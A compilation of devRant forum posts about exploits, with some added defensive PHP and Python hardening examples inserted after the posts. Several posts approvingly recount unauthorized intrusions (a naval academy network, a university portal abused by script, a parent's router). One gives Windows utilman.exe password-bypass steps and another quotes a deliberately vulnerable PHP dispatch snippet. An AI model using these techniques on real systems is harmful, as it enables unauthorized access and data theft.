Search - "exploit"
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 Hour (finding a good exploit took some time, got to root level easily afterwards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux: (RHEL based systems): Still not exploited, SELinux is powerful, motherfucker.
Keep in mind that I had a great pentesting setup back then 😊. I don't have nor do that anymore since I love defensive security more nowadays and simply don't have the time anymore.
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including vps's and dedi's) so I get the usual amount of ssh brute force attacks (thanks for keeping me safe, CSF!) which is about 40-50K every hour. Those ip's automatically get blocked after three failed attempts within 5 minutes. No root login allowed + rsa key login with freaking strong passwords/passphrases.
linu.xxx/much-security.nl - All kinds of attacks, application attacks, brute force, DDoS sometimes but that is also mostly mitigated at provider level, to name a few. So, except for my own tests and a few ddos's on both those domains, nothing really threatening. (as in, nothing seems to have fucked anything up yet)
How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? Installed a barebones Ubuntu server onto both. They only come with system-default applications. Tried installing Nginx next day, port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running and thought I'd run that for fun while I knew I didn't install it and it didn't come with the distro. It was actually running. Checked the auth logs and saw successful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any ip address which had three failed ssh logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned ip addresses - holy fuck, no wonder I got hacked!
One other kind/type of attack I get regularly but if it doesn't get much worse, I'll deal with that :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks for example.
System attacks: Anti brute force software (Fail2Ban or CSF), anti rootkit software, AppArmor or (which I prefer) SELinux which actually catches quite some web app attacks as well and REGULARLY UPDATING THE SERVERS/SOFTWARE.
So yah, hereby :P
Started talking with someone about general IT stuff. At some point we came to the subject of SSL certificates and he mentioned that 'that stuff is expensive' and so on.
Kindly told him about Let's Encrypt and also that it's free and he reacted: "Then I'd rather have no SSL, free certificates make you look like you're a cheap ass".
So I told him the principle of login/registration thingies and said that they really need SSL, whether it's free or not.
"Nahhh, then I'd still rather don't use SSL, it just looks so cheap when you're using a free certificate".
Hey you know what, what about you write that sentence on a whole fucking pack of paper, dip it into some sambal, maybe add some firecrackers and shove it up your ass? Hopefully that will bring some sense into your very empty head.
Not putting a secure connection on a website, (at all) especially when it has a FUCKING LOGIN/REGISTRATION FUNCTION (!?!?!?!!?!) is simply not fucking done in the year of TWO THOUSAND FUCKING SEVENTEEN.
'Ohh but the NSA etc won't do anything with that data'.
Has it, for one tiny motherfucking second, come to mind that there's also a thing called hackers? Malicious hackers? If your users are on hacked networks, it's easy as fuck to steal their credentials, inject shit and even deliver fucking EXPLOIT KITS.
Oh and you bet your ass the NSA will save that data, they have a whole motherfucking database of passwords they can search through with XKeyScore (snowden leaks).
Boot up a Linux live usb on a Windows machine, then rename cmd.exe to utilman.exe and after rebooting select accessibility options which now opens a command line and then 'net user username owned' to reset user 'username' password to 'owned'. Been using this for years..
Navy story continued.
And continuing from the arp poisoning and boredom, I started scanning the network...
So I found plenty of WinXP computers, even some Win2k servers (I shit you not, the year was 201X) I decided to play around with metasploit a bit. I mean, this had to be a secure net, right?
Like hell it was.
Among the select douchebags I arp poisoned was a senior officer that had a VERY high idea of himself, and also believed he was tech-savvy. Now that, is a combination that is the red cloth for assholes like me. But I had to be more careful, as news of the network outage leaked, and rumours of "that guy" went amok, but because the whole sysadmin thing was on the shoulders of one guy, none could track it to me in an explicit way. Not that I cared, actually, when I am pissed I act with all the subtleness of an atom bomb on steroids.
So, after some scanning and arp poisoning (changing the source MAC address this time) I said...
"Let's try this common exploit, it supposedly shouldn't work, there have been notifications about it, I've read them." Oh boy, was I in for a treat. 12 meterpreter sessions. FUCKING 12. The academy's online printer had no authentication, so I took the liberty of printing a few pages of ASCII jolly rogers (cute stuff, I know, but I was still in ITSec puberty) and decided to fuck around with the other PCs. One thing I found out is that some professors' PCs had the extreme password of 1234. Serious security, that was. Had I known earlier, I could have skipped a TON of pointless memorising...
Anyway, I was running amok the entire network, the sysad never had a chance on that, and he seemed preoccupied with EVERYTHING ELSE besides monitoring the net, like fixing (replacing) the keyboard for the commander's secretary, so...
BTW, most PCs had antivirus, but SO out of date that I didn't even need to encode the payload or do any other trick. An LDAP server was open, and the hashed admin password was the name of his wife. Go figure.
I looked at a WinXP laptop with a weird name, and fired my trusty ms08_067 on it. Password: "aaw". I seriously thought that Ophcrack was broken, but I confirmed it. WTF? I started looking into the files... nothing too suspicious... wait a min, this guy is supposed to work, why is his browser showing porn?
Looking at the ""Deleted"" files (hah!) I found a TON of documents with "SECRET" in them. Curious...
Decided to download everything, like the asshole I am, and restart his PC, AND to leave him with another desktop wallpaper and a text message. Thinking that he took the hint, I told the sysadmin about the vulnerable PCs and went to class...
In the middle of the class (I think it was anti-air warfare or anti-submarine warfare) the sysad burst through the door shouting "Stop it, that's the second-in-command's PC!".
Stunned silence. Even the professor (who was an officer). God, that was awkward. So, to make things MORE awkward (like the asshole I am) I burned every document to a DVD and the next day I took the sysad and went to the second-in-command of the academy.
Surprisingly he took the whole thing in quite the easygoing fashion. I half-expected court martial or at least a good yelling, but no. Anyway, after our conversation I cornered the sysad and barraged him with some tons of security holes, needed upgrades and settings etc. I still don't know if he managed to patch everything (I left him a detailed report) because, as I've written before, budget constraints in the military are the stuff of nightmares. Still, after that, oddly, most people wouldn't even talk to me.
God, that was a nice period of my life, not having to pretend to be interested about sports and TV shows. It would be almost like a story from highschool (if our highschool had such things as a network back then - yes, I am old).
[...] people near me wanted to show me something.
Person: Check out this zero-day exploit! I hacked into the system using a cloud-based cryptographically secure MD5 hash finite automata firewall HTML code API!
Me: Erm...what exactly did you hack?
Person: *shows screen while smirking*
It was a shell simulator website running “ping https://google.com”
Alright, it's not perfect yet, only one post exists and the anonymous analytics are hardly working. Next to that I'm tired as fuck and need to go to bed so fuck it, here we go:
There's not much yet, just one tiny post :)
I have no clue if it will work or crash but I think it'll handle well enough 😅
If you'd find any security issues, please don't exploit them, just report them and I'll take a look asap!
The best I have seen and exploited was years ago with a web shop that allowed me to set my own check-out price by just inspecting the element and setting the desired price. It just happily advanced to the next step where they invoked the payment provider with my custom price. Unfortunately the shop doesn't exist anymore. I have encountered many more security leaks but this one was so easy and lucrative to exploit.
It's funny, whenever the subject of facebook vs privacy comes up (mostly I don't even initiate those convo's), people always start to defend facebook when I say that I THINK that facebook is built to get people addicted to it and get them to stay on facebook as long as possible.
Haha, one of facebook's early investors/ex facebook presidents said the following in an interview:
“It’s a social-validation feedback loop, exactly the kind of thing that a hacker like myself would come up with, because you’re exploiting a vulnerability in human psychology.”
So even an ex president of facebook is admitting this.
I also found the following a good one:
The underlying thought process while creating platforms like Facebook or Instagram is something like “How do we consume as much of your time and conscious attention as possible?”
Last but not least, the part I found the most scary:
“God only knows what it’s doing to our children’s brains.”
Yes, I find this scary.
Oh yeah and for the people who are going to call bullshit on this one, I've got one source and if you search engine on the title of that article then you'll find loads of websites having that story:
The guy who reported a serious exploit in the company's system got arrested this morning. Safe to say the Hungarian public isn't very happy. I took the screenshot 5 minutes ago, it went up to 3.1k since then 😂
What is the worst thing that can happen if you report a security vulnerability to a company?
Get banned by them!
I reported a vulnerability to a company on their Facebook page (cause they don't have an email id where I can report this) and they just banned me from their page. It's really annoying me now.
And the worst thing is that they have still not fixed the issue, I wonder why the hell they banned me then.
I am planning to exploit the vulnerability and teach them why security is so important now.
I've recently read a blog post stating 'Google leaves x Million Android devices vulnerable to a new Exploit'
I don't really sympathize with Google, but it's simply the wrong message... It should be more like FUCK VENDORS, WHO WON'T SUPPLY UPDATES TO DEVICES OLDER THAN 1.5 YEARS
Seriously, it's them who make you stuck on outdated OS versions... Just imagine you could only install Windows Vista on your 2014 Lenovo ThinkPad, because it's considered outdated...
FUCK VENDORS (again, just in case)
Alright, the blog seems to be running again and it's not breaking yet which is a good sign :P.
Although nothing has changed on the front end yet, the backend has been partly rewritten to be more efficient and of course, post sorting based on posting date!
I'm aware of most of the front end issues so no need to tell me all of them again, I'll look at that tomorrow as I need sleep right now :(
If you'd find any bugs/security issues, please, don't exploit them but report them instead! I take security very seriously and will try to patch any security bug as soon as I can :)
So apparently someone discovered an exploit in iOS devices which would make shitloads of devices jailbreakable and it can't be updated due to the chip being read-only.
I'm not an expert on this by far but hereby a source:
Again, I'm not an expert on this but it does seem awesome that a lot of devices (if I read it correctly) are jailbreakable now (when someone developed one with this exploit)!
Story time :
Sometime ago I posted a video on YouTube on how to root a particular phone that was lying around at home. I was trying to demonstrate one of those "one-tap root" apps that were plentiful in the market. It so happened that one specific version of Framaroot and one particular method of exploit works for that device. I even verified this by trying different versions and it didn't work. So in the description it was mentioned to use ONLY this version that worked. Few days later there were at least 5 dislikes and comments that it didn't work on some other version.
That's how I understood how stupid and dumb people can get.
The company I work for has a Jenkins server (for people that don't know Jenkins, it's an automated build service that gets the latest git updates, pulls them and then builds, tests and deploys them)
Because it builds the software, people were scared to update it so we were running version 1.x for a long time, even when an exploit was found... Ooh boy did they learn from that...
The jenkins server had a hidden crypto miner running for about 5 days...
I don't know why we don't have detectors for that stuff... (like cpu load being high for 15 minutes)
I even tried to strengthen our security... You know basic stuff LIKE NOT SAVING PASSWORDS TO A GOOGLE SPREADSHEET! 😠
But they shoved it aside because they didn't have time... I tried multiple times but in the end I just gave up...
Jokes aside, this got me thinking HTML is the most used and most successful hacking tool out there.
99.99% of the time it's far easier to socially engineer and phish for existing credentials than to scan networks, sniff ports and look for vulnerable versions of software, new vulnerabilities etc.
We (people) are and always will be a zero day exploit.
I have a Kali Linux VM running on my Windows machine. I decide to try and exploit the Windows machine (THAT THE VM WAS RUNNING ON) because of a vulnerability with smb that requires NO user interaction. I decided to make my computer shoot its own legs and I thought "Hey, this is gonna be fine."
Aaaaand the whole system crashed on me.
Dear people who think Microsoft buying GitHub is fine because Microsoft is more supportive of open source than before.
Here's the facts.
1) Microsoft is a large tech company investing in many things. That's a fact.
2) If Microsoft were to exploit GitHub, it would be a benefit to other departments in Microsoft. This is also a fact.
(For example, if tomorrow GitHub was tied to azure or some annoying shit like that.)
3) If such exploitation occurs, it will most likely be to the detriment of the free community of developers. This is a highly probable outcome.
4) The only question now is this.
"Does Microsoft care about open source enough to cut down on potential profit."
The answer of any sane, unbiased individual had to be no.
This is why people leave GitHub today. It is NOT because of some childish hatred for Microsoft. In fact, I would've personally moved out of GitHub if "any" other large tech company had bought it, thereby compromising its neutrality.
So this story is from my University days. I was in the 6th semester back then, studying CS.
My University website was pretty shitty. Basically it was one of those old ass website that said "Best viewed in IE8". Anyway, I was snooping about the website, trying to find some news regarding an event.
I logged into my account, and randomly browsed into the leave request portal. This was a basic HTML form where students could apply for leaves from the classes and see the status of the leaves, if they have been granted or not. I noticed that the link to the request portal from the student login welcome page was actually something like http://univ.com/student/index.php/..., here 1234567 was my student ID. Yep, it was hardcoded into the page, and sent as a GET request on being clicked. That was their idea of authentication I guess. I changed the student ID to someone else's, and it let me login as that person.
Long story short, I wrote a little python script to login as every person from the start of the student IDs till the end, then submit a leave request with a random dumb reason like "can't come, at the strip club" or "going for sex change operation". What I did not know was that when a request is submitted, a text message is also sent to the student's guardian's phone number. I ran the script.
That day, over 1000 parents received text messages from the University saying that their kids had applied for a leave from random date to random date for some retarded reason. It was a blast. Students were talking about how someone had "Hacked" into the system.
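The check the portal in that story was missing, as an added example that is not the university's code: the student to act on comes from the server-side session created at login, never from the ID in the URL, and a URL parameter that disagrees with the session is refused and logged, since a sweep over many IDs is exactly the enumeration the script above performed. The session keys, the constructed `$leaves` array and the logging destination are assumptions.

```php
<?php
// Added example, not the university portal's code. Session keys and the
// constructed $leaves array are assumptions standing in for the real system.
declare(strict_types=1);

// Constructed sample data: leave requests keyed by student ID.
$leaves = [
    1234567 => [['from' => '2018-03-01', 'to' => '2018-03-02', 'reason' => 'medical']],
    1234568 => [['from' => '2018-03-05', 'to' => '2018-03-05', 'reason' => 'family']],
];

// Vulnerable shape: the student to act on comes from the query string
// (index.php?student_id=1234567), so changing the number in the URL
// selects another student. Nothing ties the number to who logged in.
function studentFromRequest(array $get): ?int
{
    return isset($get['student_id']) ? (int) $get['student_id'] : null;
}

// Hardened shape: the student to act on comes only from the server-side
// session set at login. A student_id in the URL is tolerated for old links
// but must match; a mismatch is refused and logged, because many mismatches
// across many IDs from one source is the enumeration described above.
function studentFromSession(array $session, array $get): ?int
{
    if (!isset($session['student_id'])) {
        return null;                       // not logged in
    }
    $me = (int) $session['student_id'];
    if (isset($get['student_id']) && (int) $get['student_id'] !== $me) {
        error_log(sprintf(
            'IDOR attempt: session student %d requested %s from %s',
            $me,
            substr((string) $get['student_id'], 0, 16),
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'
        ));
        return null;                       // refuse; never fall back to the URL value
    }
    return $me;
}

// Submitting a leave request goes through the same gate, so a script like
// the one in the story could only create requests for the account it holds.
function submitLeave(array &$leaves, ?int $student, string $from, string $to, string $reason): bool
{
    $date = '/^\d{4}-\d{2}-\d{2}$/';
    if ($student === null || !preg_match($date, $from) || !preg_match($date, $to) || $from > $to) {
        return false;
    }
    $leaves[$student][] = ['from' => $from, 'to' => $to, 'reason' => substr($reason, 0, 200)];
    return true;
}

// Request handling, only when served by a web server (not on the CLI).
if (PHP_SAPI !== 'cli') {
    session_start();
    $student = studentFromSession($_SESSION, $_GET);
    if ($student === null) {
        http_response_code(403);
        exit('Not authorised');
    }
    header('Content-Type: application/json');
    echo json_encode($leaves[$student] ?? []);
}
```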
It has been bugging the shit out of me lately... the sheer number of shit-tier "programmers" that have been climbing out of the woodwork the last few years.
I'm not trying to come across as elitist or "holier than thou", but it's getting ridiculous and annoying. Even on here, you have people who "only do frontend development" or some other lame ass shit-stain of an excuse.
When I first started learning programming (PHP was my first language), it wasn't because I wanted to be a programmer. I used to be a member (my account is still there, in fact) of "HackThisSite", back when I was about 12 years old. After hanging out long enough, I got the hint that the best hackers are, in essence, programmers.
Want to learn how to do SQL injection? Learn SQL - write a program that uses an SQL database, and ask yourself how you would exploit your own software.
Want to reverse engineer the network protocol of some proprietary software? Learn TCP/IP - write a TCP/IP packet filter.
Back then, a programmer and a hacker were very much one in the same. Nowadays, some kid can download Python, write a "hello, world" program and they're halfway to freelancing or whatever.
It's rare to find a programmer - a REAL programmer, one who knows how the systems he develops for better than the back of his hand.
These days, I find people want the instant gratification that these simpler languages provide. You don't need to understand how virtual memory works, hell many people don't even really understand C/C++ pointers - and that's BASIC SHIT right there.
Put another way, would you want to take your car to a brake mechanic that doesn't understand how brakes work? I sure as hell wouldn't.
Watching these "programmers" out there who don't have a fucking clue how the code they write does what it does, is like watching a grown man walk around with a kid's toolbox full or plastic toys calling himself a mechanic. (I like cars, ok?!)
Python, AngularJS, Bootstrap, etc. They're all tools and they have their merits. But god fucking dammit, they're not the ONLY damn tools that matter. Stop making excuses *not* to learn something, Mr."IOnlyDoFrontEnd".
Coding ain't Lego's, fuckers.
While watching Computerphile's video on the new atom bombing exploit.
Actually, he is kinda right 😂
I make a typo in the username
"username doesn't exist"
I fix the typo and mess up the password
... I smell a potential exploit here...
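The leak in that login form is the two different messages, and the usual fix is one message for every failure plus a hash check that runs even for unknown usernames. Added example, not the site from the rant; the `$users` table is constructed and the log destination is an assumption.

```php
<?php
// Added example, not the site from the rant. The user table is constructed.
declare(strict_types=1);

// Constructed user store: username => password_hash().
function buildUsers(): array
{
    return ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];
}

// Leaky shape, as in the rant: the message alone tells the caller whether
// the username exists, before the password is even considered.
function loginLeaky(array $users, string $user, string $pass): string
{
    if (!isset($users[$user])) {
        return "username doesn't exist";
    }
    return password_verify($pass, $users[$user]) ? 'ok' : 'wrong password';
}

// Hardened shape: one message for every failure, and password_verify() runs
// against a dummy hash for unknown users so response time does not leak what
// the message used to. Failures are logged per username and source, so a
// sweep over many usernames still stands out in the logs. The same rule
// applies to registration and password-reset forms, which leak identically.
function loginUniform(array $users, string $user, string $pass, string $source = 'cli'): string
{
    static $dummy = null;
    $dummy ??= password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
    $known = isset($users[$user]);
    $hash  = $known ? $users[$user] : $dummy;
    $ok    = password_verify($pass, $hash) && $known;   // verify runs either way
    if (!$ok) {
        error_log(sprintf('login failed user=%s from %s', substr($user, 0, 32), $source));
        return 'invalid username or password';
    }
    return 'ok';
}

// Stand-alone run: both a typo in the username and a wrong password now
// produce the same text.
$users = buildUsers();
echo loginLeaky($users, 'alcie', 'correct horse'), "\n";   // username doesn't exist
echo loginUniform($users, 'alcie', 'correct horse'), "\n"; // invalid username or password
echo loginUniform($users, 'alice', 'wrong'), "\n";         // invalid username or password
echo loginUniform($users, 'alice', 'correct horse'), "\n"; // ok
```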
Sports commenter at AI vs AI deathmatches.
It would probably go like this:
- UltimateGod the Second launches half of the US nuclear missiles to NorthernEurope!
I guess that's it for the poor bugger.
- WankerBot69 tries to delay its doom by channeling old 4chan archives into a devastating ddos attack. UGtS' logic processes go down for a few nanoseconds... Ugh, that's NASTY! It doesn't even have a mother
- Missiles still going up. Looks like UGtS confused the imperial and metric system just like its predecessor.
- WB69 now has the upper hand. It just used an SMB exploit and is now encrypting UGtS's storage.
- UGtS is down. We all hope UltimateGod the third will do better. For now, all hail our catevolent overlord WankerBot69.
- See you next time on Bot Armageddon folks!
I hacked a browser game a few years ago for fun and the exploit I found and used was basically this:
$f = $_GET['f'];
$p = $_GET['p'];
So it was possible to pass a function and its parameter in the URL to the server. The author used this to include() sub pages. I used it to highlight_file() them.
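The shape of that snippet next to an allowlisted replacement, as an added example that is not the game's code: no function name and no path ever come from the request; a short key selects an entry from a fixed map, and unknown keys are logged rather than dispatched. The `$f($p)` line stands in for whatever the game did with the two parameters, and the page names and directory are assumptions.

```php
<?php
// Added example, not the browser game's code. PAGES and PAGE_DIR are assumptions.
declare(strict_types=1);

// Vulnerable shape: the request chooses both the function and its argument,
// so the caller can run any one-argument function on any string. That is
// why swapping the intended include() for highlight_file() turned "show a
// sub page" into "show the source of a sub page".
function dispatchUnchecked(array $get)
{
    $f = $get['f'];
    $p = $get['p'];
    return $f($p);
}

// Hardened shape: a fixed map from a short key to a file in one directory.
// The request can only pick a key; the map alone decides what is loaded.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'      => 'home.php',
    'inventory' => 'inventory.php',
    'ranking'   => 'ranking.php',
];

function resolvePage(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, PAGES)) {
        return null;                        // unknown key: never touch the filesystem
    }
    return PAGE_DIR . '/' . PAGES[$key];
}

// Anything that is not a known key is a cheap detection signal: with this
// in place the hosting side sees f=highlight_file in its logs instead of
// serving it. Returns the resolved file, or null after a 404.
function handle(array $get): ?string
{
    $key  = isset($get['p']) ? (string) $get['p'] : 'home';
    $file = resolvePage($key);
    if ($file === null) {
        error_log('page dispatch rejected p=' . substr($key, 0, 80)
            . (isset($get['f']) ? ' f=' . substr((string) $get['f'], 0, 40) : ''));
        http_response_code(404);
        return null;
    }
    return $file;
}

if (PHP_SAPI !== 'cli') {
    $file = handle($_GET);
    if ($file !== null) {
        require $file;                     // always a map value, never request input
    }
}
```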
I sent all the required documents, all you have to do is sign. Why do you have to hit me with an email asking if the "male" staying with me is actually a friend or a boyfriend when it didn't bother you at all when you didn't know whether he's a penis-wielder or a sinkhole-bearer?
Then goes the declaration of your concern for my safety (safety from the dangers of the male kind?) because I'm like your own child. You ask me if my parents would get mad about a man staying with me. I'm already in my 20's. I'm not an extra virgin coconut oil. Oh boy, if you only knew, you'd get a heart attack. Sometimes I feel like my physical appearance or general image doesn't match the foul-mouthed, disgusting, psychotic little fuck that I really am inside.
I'm just frustrated and need to let it out. People showing me they care embarrasses me (hard to explain) and I also find it hard to believe them. In my experience, people do that so they can extract private information from you and then later use it to exploit or humiliate you. It doesn't only happen in the tech world.
I don't hate my landlord, she's nice. I just really hate the "too close" relationships culture here. I know it's her place and she has the right to know who's staying here, the rest of the questions are just a little too extreme for me no matter how good the intention is. I honestly don't know what she's expecting.
That's the random rant. Now if you will excuse me, I'm gonna rip someone's stomach open, shove my head in, and motorboat his intestines. I want to see if he giggles. Why is my face red? Definitely not from embarrassment!
Me: *finds exploit in site at work*
Developer of site: "You talk bs"
Me: "lemme show ya"
While I was trying to demo it, the guy quickly patched it xD (making it look as if it didn't work in the first place)
I just found a new WhatsApp Crash Exploit. Full denial of service right there. An attacker could send a message to a Chat (be it private Chat or group Chat) and everyone who receives the message has no chance of starting WhatsApp again. It crashes and won't restart.
Tested on latest version on Samsung Galaxy S6 and S8. Don't know if it works on other versions but I am pretty sure it does. (It's midnight here, no one online to test)
The fun thing is, I knew this Bug for a long time but when I last tested it, nothing happened. Which means this Crash is only possible because someone at WhatsApp programmed a new Feature...
Just spent the entire day of which should have been the start of vacation fighting off a second wave of ransomware on one of our production servers. Gandcrab 5.2 anyone?
Turns out an exploit in our MySQL daemon allowed some fucking Chinese hackermonkey to upload a trojan and remote execute it. Thousands of angry customers, me the only one available and able to fix shit and patch up firewalls and system.
And now I get the pleasure of working on what I should have been doing today, another fire that MUST be put out today.
Fuck you deadlines. Fuck you Chinese hackers. In fact, FML.
A follow up for this rant : https://devrant.com/rants/1429631/...
It's morning and I have been awake all night, but I am so happy and feel like crying seeing you people's response. :''''') Thank you for helping a young birdie like me from getting exploited.
In summary, I am successfully out of this trickery, but with cowardice, a little exploited and being continuously nagged by my friend as a 'fool'.
Although I would be honest, I did take a while to make my decision and got carried away by his words.
After a few hours of creating a group, he scheduled a conference call, and asked me to submit the flow by which my junior devs will work.
At that time I was still unclear about whether to work or not and had just taken a break from studies. So thought of checking the progress and after a few minutes, came up with a work-flow, dropped it in the group and muted it.
At night I thought of checking my personal messages, and that guy had PMed me that the team is not working, check on their progress. This got me pissed and I diverted the topic by asking when he would be mailing my letter of joining.
His fucking reply to this was: "After the project gets completed!"
(One more example of his attempts to be manipulative coming up, but along with my cowardice) :/
WTF? With a team like this and their leader being 'me' (who still calls himself a noob after 2 internships and 10 months android exp), this project would have taken at least one month and I was not even counting myself in the coding part (the exams).
So just to clarify what would be the precise date by which he is expecting the task, to which he said "27th" (i.e, tomorrow!)
I didn't respond. And rather checked the details of the guy (knew that the company was a start-up, but start-ups do sound hopeful, if they are doing it right). A quick social media search gave me the results that he is a fuckin 25 year old guy who just did a masters and started this company. There was no mention of investors anywhere but his company's linkedin profile showed up with "11-50" members.
After half an hour I told him that I'm not in this anymore, left the group and went back to study. (He wanted to ask for reasons, but I denied by saying a change of mind, personal problems, etc)
Well the reality is over but here comes the cowardice part:
1) Our team was working on a private repo hosted on my account and I voluntarily asked him to take back the ownership, just to come out of this safely w/o pissing him off.
2) The "test" he took of me was the wireframe given by their client and which was the actual project we 5 were working on. So, as a "test", I created 15 activities of their client's app and have willingly transferred it to them.
3) In my defence, I only did it because (i) I feared this small start-up could harm my reputation on open platforms like linkedin and (ii) the things I developed were so easy that I don't mind giving them. They were just UI, designed quickly, but except for that, they were nothing (even a button needs code in the backend to perform something and I had not done it). Moreover, the guys working under me had changed a lot of things, so I felt bad for them and dropped the idea of damaging it.
Right now I'm just out of sleep, null of thoughts and just wondering whether I'm a good person, a safe player or just a stupid, easily manipulated fool
But once again my deepest regard from my heart for @RustyCookie, @geaz, @tarstrong, and @YouAreAPIRate for positive advice.
My love for devrant is growing everyday <3 <3 <3 <3
So today I found a way to break into any Apple Mac (provided the exploit hasn't been fixed by the owner) and access all private files, as long as I have physical access to it, in less than 5 minutes.
After finding this, a quick Google on the method reveals this has been a workaround for years.
And to think I once praised Apple for their security standards.
Edit: this was done to an in-house Mac that my company owns, and had been password locked by a member of staff who had been fired, but held important company documents on the computer. It was in no way a breach of privacy.
watching the online course for CEH... dude used the Death Star as a tangible example of how exploits work.
IDK if I should love it for the nerdiness, or be slightly sad that someone needs that type of example of what a vulnerability vs an exploit is, when they're going for the Certified Ethical Hacker certification...
Might be better in an introduction to Network Security class?
Also, while discussing the security, usability, and functionality triangle, he referenced the Staples "Easy Button" - does one thing, not very secure, and not very functional (in that it has no more than one function)...
So my story has some little backstory.
I got into computers and technology because of my dad. He was very enthusiastic when I was little and when I grew older and started my apprenticeship as a software developer he was really proud. Note that he never learned anything like that. He just loved computers and games.
Now to the story itself.
I learned more and more, also about networking and came to the conclusion that our slow internet and rare internet problems probably come from stock/weird configurations. But my dad's pride probably told him that's a thing he still has to do as the dad. But it annoyed me so much that I booted into Kali Linux, loaded an exploit to get the web admin password and cracked it within a minute. 😎
Finally I was able to configure everything correctly (channels were spammed from neighbours so I switched to a very unused one and the disturbances got less).
TL;DR: Dad didn't want me to configure our router and didn't give me the admin password, so I booted Kali Linux and used an exploit to get it myself 😎😎
Fuck sake, so my bank has been migrating/rolling out new IT system and app/site have been broken for about a week (others noted evidence of devs debugging in production)
Assuming I don't lose my money as some mischievous assholes will inevitably exploit the fuck up, and rob the bank, I will be moving my funds to a different bank...
In mean time I'm trying to prepare for uni, and they're making a ton of semi-random changes in addition to rolling out a site with course details and info along those line, and good fucking god is it bad.
Is it slow as fuck? Check. Does it use never-seen-before naming for standard things? Check! Is the UI pulled from the late 90's? YOOU BETCHA! Are the pages bloated with unnecessary content? Fuck yeah! Do I get SQL exceptions when I finally locate my course? Of course I do. Does clicking "back" take me back to the landing page instead of the previous page, when I'm several steps deep? .....
I could keep going, but don't feel like ranting and feel more like punching someone in the throat. Repeatedly.
Unpaid internships are the worst thing. You exploit young people and promise them experience. Seriously business makes tons of money yet they come up with ways to exploit a young person in IT. I think it is evil.
A node package, event-stream, was infected. Basically, the exploit seems to steal data from mining cryptocurrencies. What was amazing was the GitHub repo owner's attitude about it. I would normally agree with it not being his issue anymore if it weren't for the following:
1. The pendejo did not archive the repo to indicate that he is free of fault and that it is not his anymore.
2. You can't just entrust a fucking software lib to any pendejo that asks.
3. Eat a dick nigga
I'm a little confused here. How are "viruses" different from "exploits" in Linux? The way I see it, they're the exact same thing. Although "exploit" makes it sound cool 😂
It's cute how most companies think that someone will take the time to personally hack them. Like nah mate, there are countless bots running around the internet like a rabid pack of dogs sniffing IP addresses and running exploits; one of the stragglers will pick you off...
A developer said to me: developers may hurry to finish the project before the deadline, so they might miss many security bugs, especially in the updates, and a creative hacker will later take his time and exploit them.
Is it correct?
The site I work on is a marketplace where you can buy magnets for pain, insomnia, blah blah blah (I don't believe in this for a second).
Just saying that to establish that 80% of our customers are 45+ years old. They weren't born with a computer in their hands, and they sometimes manage to make a lot of mess on the site.
We are based in France, and we sell the most in France (no shit) and Switzerland. And this is the third time that a Swiss customer places an order and puts her whole address in Switzerland EXCEPT for the country (still set to France), so she doesn't have to pay the shipping fee. I should do something about that, like a regex check when verifying the zip code, but I have more urgent work to do, and the best is yet to come.
This smartass doesn't know she is the joke, because by saying she is in France, she has to pay the VAT that she wouldn't have to pay if she said she was in Switzerland. She generally buys for around 350 €, so she pays ~70 € (20%) in VAT, while she would only pay 14 € in shipping fees.
Maybe one day she'll see how dumb she is (my boss already mailed her so she'd pay attention to it, no change). But I think I will have set up the regex by then.
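An added example of the check the rant above talks about (not the poster's code, and not taken from their shop): validate that the postcode matches the format of the selected country, and when it doesn't, say which country it does look like. It assumes only the two formats the post mentions, French postcodes being five digits and Swiss ones four; the function names are made up for this example.

```python
import re

# Postcode formats for the two countries named in the post. Extend as needed.
POSTCODE_FORMATS = {
    "FR": re.compile(r"^\d{5}$"),   # France: five digits, e.g. 75001
    "CH": re.compile(r"^\d{4}$"),   # Switzerland: four digits, e.g. 8001
}


def postcode_matches_country(postcode, country):
    """True if `postcode` is well-formed for `country` (ISO alpha-2 code)."""
    pattern = POSTCODE_FORMATS.get(country.strip().upper())
    if pattern is None:
        return False  # unknown country: refuse rather than guess
    return bool(pattern.match(postcode.strip()))


def likely_countries(postcode):
    """Countries whose postcode format this value fits, sorted by code."""
    return sorted(
        code for code, pattern in POSTCODE_FORMATS.items()
        if pattern.match(postcode.strip())
    )


def check_order_address(address):
    """Return a list of problems with an order's shipping address.

    `address` is a dict with at least "country" and "postcode" (hypothetical
    field names for this example). An empty list means the address passed.
    """
    problems = []
    country = address.get("country", "").strip().upper()
    postcode = address.get("postcode", "").strip()
    if not postcode_matches_country(postcode, country):
        msg = f"postcode {postcode!r} does not match country {country}"
        likely = likely_countries(postcode)
        if likely:
            msg += " (looks like " + "/".join(likely) + ")"
        problems.append(msg)
    return problems
```

The mismatch case from the post, a Swiss postcode with the country left on France, is flagged at checkout instead of being discovered after the order is placed. The check is on format only; it does not prove the address exists.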
I really just came across this on a legit apartment rental website.
I can see no possible way for this to go wrong.
No possible way that anyone could exploit this... 🙃
How do you handle narcissist managers?
Who look at you not as a human being but as a thing to exploit for personal gain? Sure, there's the business side (capitalism), but the human side of it bothers me.
I'm performing a pentest for my client.
So after scanning my client's network I understood they're using IIS 4.5 and Windows Server 2012 (or 2012 R2).
I know the systems are real old.
And there are known exploits for them.
